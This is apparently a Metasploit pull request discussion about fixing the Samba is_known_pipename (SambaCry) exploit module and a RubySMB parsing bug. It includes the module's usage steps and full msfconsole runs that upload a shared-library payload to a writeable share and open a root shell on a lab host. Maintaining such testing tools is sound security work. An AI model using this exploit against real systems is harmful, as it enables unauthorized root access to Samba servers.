Fix is_known_pipename module

[cdelafuente-r7]

This fixes part of #13976.

This requires these fixes in RubySMB library, which are not merged yet: rapid7/ruby_smb#163
To test this PR, RubySMB will need to be used from source until this PR is merged and a new gem is released:
- Do: git clone https://github.com/cdelafuente-r7/ruby_smb
- Do: cd path/to/ruby_smb
- Do: git checkout fix_for_old_samba_compatibility
- Add this to your Gemfile: gem 'ruby_smb', :path => 'path/to/ruby_smb'
- Do: bundle install
UPDATE: The PR has been merged and a new ruby_gem has been released. I updated the Gemfile.lock to reflect this.

This as been tested against Samba 3.5.4, 3.6.6 and 4.1.11.

Verification

• Start msfconsole
• use linux/samba/is_known_pipename
• set RHOSTS <host>
• set SMBUSER <username>
• set SMBPASS <password>
• exploit
• Verify it does not break
• Verify a session is created

[smcintyre-r7]

I'm going to mark this delayed. rapid7/ruby_smb#163 has been landed (and please correct me if I'm wrong) but you didn't want a release to be made until you had a chance to look at another issue and this is blocked until a new release is made right?

[cdelafuente-r7]

That's correct! Thanks for the review! I'll let you know when the new ruby_smb gem is released.

[cdelafuente-r7]

@smcintyre-r7 , a new ruby_smb gem has been released and I updated Gemfile.lock.

[smcintyre-r7]

Well I tested this and I couldn't get the module to work without commenting out these lines in RubySMB.

With the RubySMB exception

msf6 exploit(linux/samba/is_known_pipename) > show options 

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOSTS          192.168.159.51   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER      test             no        The directory to use within the writeable SMB share
   SMB_SHARE_NAME  NetApps          no        The name of the SMB share containing a writeable directory


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Interact)


msf6 exploit(linux/samba/is_known_pipename) > exploit

[*] 192.168.159.51:445 - Use Rex client (SMB1 only) to enumerate directories, since it is not compatible with RubySMB client
[-] 192.168.159.51:445 - Write NetApps\test\zGydx.txt: Expecting SMB1 protocol with command=50, got SMB1 protocol with command=50, Status: (0x00000000) STATUS_SUCCESS: The operation completed successfully.
[-] 192.168.159.51:445 - Write NetApps\JANSI.txt: Expecting SMB1 protocol with command=50, got SMB1 protocol with command=50, Status: (0x00000000) STATUS_SUCCESS: The operation completed successfully.
[-] 192.168.159.51:445 - Write NetApps\test\oTAzH.txt: Expecting SMB1 protocol with command=50, got SMB1 protocol with command=50, Status: (0x00000000) STATUS_SUCCESS: The operation completed successfully.
[*] 192.168.159.51:445 - Use Rex client (SMB1 only) to enumerate directories, since it is not compatible with RubySMB client
[-] 192.168.159.51:445 - Enum print$: The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
[*] 192.168.159.51:445 - Use Rex client (SMB1 only) to enumerate directories, since it is not compatible with RubySMB client
[-] 192.168.159.51:445 - Write NetApps\test\AWscL.txt: Expecting SMB1 protocol with command=50, got SMB1 protocol with command=50, Status: (0x00000000) STATUS_SUCCESS: The operation completed successfully.
[-] 192.168.159.51:445 - Write NetApps\tdajl.txt: Expecting SMB1 protocol with command=50, got SMB1 protocol with command=50, Status: (0x00000000) STATUS_SUCCESS: The operation completed successfully.
[-] 192.168.159.51:445 - Write NetApps\test\fcWJD.txt: Expecting SMB1 protocol with command=50, got SMB1 protocol with command=50, Status: (0x00000000) STATUS_SUCCESS: The operation completed successfully.
[-] 192.168.159.51:445 - No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER
[-] 192.168.159.51:445 - Exploit aborted due to failure: no-target: No matching target
[*] Exploit completed, but no session was created.
msf6 exploit(linux/samba/is_known_pipename) >

Without the RubySMB exception

msf6 exploit(linux/samba/is_known_pipename) > show options 

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOSTS          192.168.159.51   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER      test             no        The directory to use within the writeable SMB share
   SMB_SHARE_NAME  NetApps          no        The name of the SMB share containing a writeable directory


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Interact)


msf6 exploit(linux/samba/is_known_pipename) > exploit

[*] 192.168.159.51:445 - Use Rex client (SMB1 only) to enumerate directories, since it is not compatible with RubySMB client
[*] 192.168.159.51:445 - Using location \\192.168.159.51\NetApps\test for the path
[*] 192.168.159.51:445 - Retrieving the remote path of the share 'NetApps'
[*] 192.168.159.51:445 - Share 'NetApps' has server-side path '/data/network-applications
[*] 192.168.159.51:445 - Using payload wrapper 'samba-root-findsock-x86_64'...
[*] 192.168.159.51:445 - Uploaded payload to \\192.168.159.51\NetApps\test\HajBLyRP.so
[*] 192.168.159.51:445 - Loading the payload from server-side path /data/network-applications/test/HajBLyRP.so using \\PIPE\/data/network-applications/test/HajBLyRP.so...
[+] 192.168.159.51:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.159.51:445) at 2020-08-28 12:12:39 -0400

id
uid=0(root) gid=0(root) groups=0(root)
pwd
/tmp

I think the root cause is this check in EmptyPacket. From debugging I can confirm with certainty that the parameter_block.word_count and data_block.byte_count values are both non-zero. What's confusing is that the response's representation in the error includes that the status was successful.

[cdelafuente-r7]

Thanks for testing this @smcintyre-r7 ! I tracked down the issue and it is related to a bug in SMB1 Trans2 response packet structures. This has been fixed in rapid7/ruby_smb#165.

RubySMB tries to parse the response packet as an EmptyPacket when something went wrong with parsing the original packet structure (RubySMB::SMB1::Packet::Trans2::SetFileInformationResponse in this case), but the valid? routine detects it is not a correct EmptyPacket the issue and returns false.

I'm going to mark this PR as delayed again until rapid7/ruby_smb#165 has been landed.

[smcintyre-r7]

With the latest RubySMB (2.0.6) changes this is now working as intended:

msf6 exploit(linux/samba/is_known_pipename) > show options 

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Interact)


msf6 exploit(linux/samba/is_known_pipename) > set RHOSTS 192.168.159.51
RHOSTS => 192.168.159.51
msf6 exploit(linux/samba/is_known_pipename) > set SMB_FOLDER test
SMB_FOLDER => test
msf6 exploit(linux/samba/is_known_pipename) > set SMB_SHARE_NAME NetApps
SMB_SHARE_NAME => NetApps
msf6 exploit(linux/samba/is_known_pipename) > exploit

[*] 192.168.159.51:445 - Using location \\192.168.159.51\NetApps\test for the path
[*] 192.168.159.51:445 - Retrieving the remote path of the share 'NetApps'
[*] 192.168.159.51:445 - Share 'NetApps' has server-side path '/data/network-applications
[*] 192.168.159.51:445 - Uploaded payload to \\192.168.159.51\NetApps\test\uXMZXHua.so
[*] 192.168.159.51:445 - Loading the payload from server-side path /data/network-applications/test/uXMZXHua.so using \\PIPE\/data/network-applications/test/uXMZXHua.so...
[+] 192.168.159.51:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.159.51:445) at 2020-09-23 17:44:03 -0400

id
uid=0(root) gid=0(root) groups=0(root)
^C
Abort session 1? [y/N]  y

[*] 192.168.159.51 - Command shell session 1 closed.  Reason: User exit
msf6 exploit(linux/samba/is_known_pipename) >

I've removed the delayed tag, then I'll bump the RubySMB version in the Gemfile as I land this. Thanks @cdelafuente-r7 !

[smcintyre-r7]

Release Notes

Fixed an issue in the exploits/linux/samba/is_known_pipename exploit module which targets samba. There was an incorrect SMB version 1 data structure definition that was causing the module to fail to verify a writeable directory.